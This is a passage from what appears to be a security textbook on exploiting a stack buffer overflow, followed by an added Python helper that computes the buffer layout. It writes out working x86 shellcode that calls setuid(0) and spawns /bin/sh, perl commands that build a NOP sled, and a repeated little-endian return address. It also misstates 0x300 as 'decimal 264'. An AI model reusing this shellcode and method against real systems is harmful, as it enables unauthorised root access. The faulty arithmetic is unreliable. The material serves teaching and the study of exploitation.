As a rule of thumb, it is a
good idea to fill half of the attack buffer with NOPs; in this case we will use 200 with the
following perl command:
perl -e 'print "\x90"x200';
A similar perl command will allow you to print your shellcode into a binary file as follows
(notice the use of the output redirector >):
$ perl -e 'print "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";' > sc
$
You can calculate the size of the shellcode with the following command:
$ wc -c sc
53 sc
Next we need to calculate our return address, which will be repeated until it overwrites
the saved eip on the stack. Recall that our current esp is 0xbffffbd8. When attacking from
the command line, it is important to remember that the command-line arguments will
be placed on the stack before the main function is called. Since our 408-byte attack
string will be placed on the stack as the second command-line argument, and we want to
land somewhere in the NOP sled (the first half of the buffer), we will estimate a landing
spot by subtracting 0x300 (decimal 264) from the current esp as follows:
0xbffffbd8 - 0x300 = 0xbffff8d8
Now we can use perl to write this address in little-endian format on the command line:
perl -e 'print "\xd8\xf8\xff\xbf"x38';
The number 38 was calculated in our case with some simple modulo math:
(408 bytes - 200 bytes of NOP - 53 bytes of shellcode) / 4 bytes of address = 38.
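The layout arithmetic from this section carried through in Python, as an added example that is not from the book: the function and its name are my own, and it only works with sizes, offsets and the little-endian encoding of the address, using the values given above (408-byte string, 200 NOPs, 53-byte shellcode, esp 0xbffffbd8, offset 0x300).

```python
import struct


def plan_attack_buffer(total_len, nop_len, shellcode_len, esp, back_off):
    """Work through the sled + shellcode + repeated-address layout.

    Only sizes and addresses are handled here; no payload bytes are built.
    Returns the estimated landing address, its little-endian bytes (the
    string handed to perl), how many 4-byte address copies fit, how many
    bytes the integer division drops, and the byte ranges of each region.
    """
    landing = esp - back_off                    # estimated spot inside the NOP sled
    ret_bytes = struct.pack("<I", landing)      # little-endian, as the x86 stack stores it
    room = total_len - nop_len - shellcode_len  # bytes left for return addresses
    repeat = room // 4                          # whole addresses that fit (the "x38")
    leftover = room % 4                         # remainder the division discards
    addr_start = nop_len + shellcode_len
    return {
        "landing": landing,
        "ret_bytes": ret_bytes,
        "repeat": repeat,
        "leftover": leftover,
        "sled": (0, nop_len),
        "shellcode": (nop_len, addr_start),
        "addresses": (addr_start, addr_start + 4 * repeat),
        "actual_len": addr_start + 4 * repeat,  # what the three perl prints add up to
    }


if __name__ == "__main__":
    p = plan_attack_buffer(408, 200, 53, 0xBFFFFBD8, 0x300)
    print(f"landing {p['landing']:#010x} -> perl string {p['ret_bytes']!r}")
    print(f"{p['repeat']} address copies, {p['leftover']} bytes left over, "
          f"assembled string is {p['actual_len']} bytes")
```

The 3 leftover bytes mean the assembled string is 405 bytes rather than 408, so the distance from the start of the buffer to the saved eip is worth checking against the `addresses` range before assuming one of the copies lands on it.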